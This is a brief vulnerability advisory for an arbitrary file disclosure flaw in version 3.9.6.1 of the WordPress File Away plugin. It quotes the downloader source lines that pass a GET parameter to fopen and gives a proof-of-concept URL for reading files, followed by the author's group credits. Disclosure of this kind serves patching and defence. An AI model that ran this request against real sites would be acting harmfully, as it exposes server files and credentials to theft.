Title: wordpress file-away plugin - File Disclosure
Author: Abolfazl Hajizade
Vendor: https://wordpress.org/plugins/file-away/
Version: 3.9.6.1
Date: 7.7.2018
tested on: Windows-linux
Vulnerable page:
/file-away/lib/cls/class.fileaway_downloader.php
Vulnerable Source:
line 16: $file = $this->decrypt($_GET['fileaway']);
line 35: $file = fopen($file, 'rb');
line 40: fread($file, 1024 * 8))
POC:
http://site.com/wp-content/plugins/file-away/lib/cls/class.fileaway_downloader.php?fileaway=path_file
=============================================
WebSite : UltraSec.Org
Channel : @UltraSecurity
Email : zeroday1010@gmail.com
Special Thanks : ashkan moghaddas , MrQadir , Milad Ranjbar